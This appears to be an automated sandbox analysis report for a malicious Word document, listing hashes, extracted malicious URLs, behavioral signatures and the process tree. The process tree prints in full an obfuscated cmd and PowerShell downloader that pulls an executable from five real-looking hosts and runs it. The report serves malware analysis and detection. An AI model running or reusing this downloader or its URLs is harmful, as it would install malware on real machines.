Analysis
-
max time kernel
101s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-05-2024 18:53
Behavioral task
behavioral1
Sample
7e048c48cf5c2879dc2a0a33101048a2_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7e048c48cf5c2879dc2a0a33101048a2_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
7e048c48cf5c2879dc2a0a33101048a2_JaffaCakes118.doc
-
Size
76KB
-
MD5
7e048c48cf5c2879dc2a0a33101048a2
-
SHA1
911f72f15361efb7c01fcde615c61c80656f0bdc
-
SHA256
c63b801b73ffc4397fcd7f78b2c3658ef29751e6dc84ff1468dc9068cf237a42
-
SHA512
44172ab2e73781abd5547059eb9463c21dbaf6d7813651c5463926cb1dd8be29f749028db57fba4cc2bb83fde5b99ccc82c08bc31299ef0b861667a80b94a22c
-
SSDEEP
768:FtVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBd8LTTnLlCiJRz9wORjKkh58/460B:Ftocn1kp59gxBK85fBCLTbJCNw6Z+a96
Malware Config
Extracted
http://samix-num.com/BcFUhvDr
http://economiadigital.biz/NKq5eOZ
http://ftp.dailyignite.club/YNB95t2
http://migoshen.org/FNE1TVJjI
http://vanoostrom.org/w8yXb69h5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2084 208 cmd.exe WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 208 WINWORD.EXE 208 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3724 powershell.exe 3724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3724 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 208 WINWORD.EXE 208 WINWORD.EXE 208 WINWORD.EXE 208 WINWORD.EXE 208 WINWORD.EXE 208 WINWORD.EXE 208 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 208 wrote to memory of 3976 208 WINWORD.EXE splwow64.exe PID 208 wrote to memory of 3976 208 WINWORD.EXE splwow64.exe PID 208 wrote to memory of 2084 208 WINWORD.EXE cmd.exe PID 208 wrote to memory of 2084 208 WINWORD.EXE cmd.exe PID 2084 wrote to memory of 3724 2084 cmd.exe powershell.exe PID 2084 wrote to memory of 3724 2084 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e048c48cf5c2879dc2a0a33101048a2_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3976
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Prairie80='Internal14';$Massachusetts17=new-object Net.WebClient;$Somalia94='http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyignite.club/YNB95t2@http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5'.Split('@');$solutions78='extend49';$eenable81 = '53';$NorthCarolina56='Lake74';$Rubber84=$env:public+'\'+$eenable81+'.exe';foreach($UgandaShilling85 in $Somalia94){try{$Massachusetts17.DownloadFile($UgandaShilling85, $Rubber84);$Concrete67='endtoend42';If ((Get-Item $Rubber84).length -ge 80000) {Invoke-Item $Rubber84;$Sleek97='ClothingGarden23';break;}}catch{}}$Wooden49='Greens14';2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Prairie80='Internal14';$Massachusetts17=new-object Net.WebClient;$Somalia94='http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyignite.club/YNB95t2@http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5'.Split('@');$solutions78='extend49';$eenable81 = '53';$NorthCarolina56='Lake74';$Rubber84=$env:public+'\'+$eenable81+'.exe';foreach($UgandaShilling85 in $Somalia94){try{$Massachusetts17.DownloadFile($UgandaShilling85, $Rubber84);$Concrete67='endtoend42';If ((Get-Item $Rubber84).length -ge 80000) {Invoke-Item $Rubber84;$Sleek97='ClothingGarden23';break;}}catch{}}$Wooden49='Greens14';3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
494B
MD51507e745dfcb593d85ee10e65f223872
SHA16caa3f7b75e9d1430ae53fcf7042adf2d0bfe4d6
SHA256a3a4144d0f0057665407727e360cfc350439eeebec951bbc3b484f2d3cdadd9b
SHA5128d9f9af84e962129874c72771464d1936e343a1a841555a04fab2a1201d54bbf2267d2addb30507409a68bd4624a987633fc49e1673fcfcebe3543391d17ad5a
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82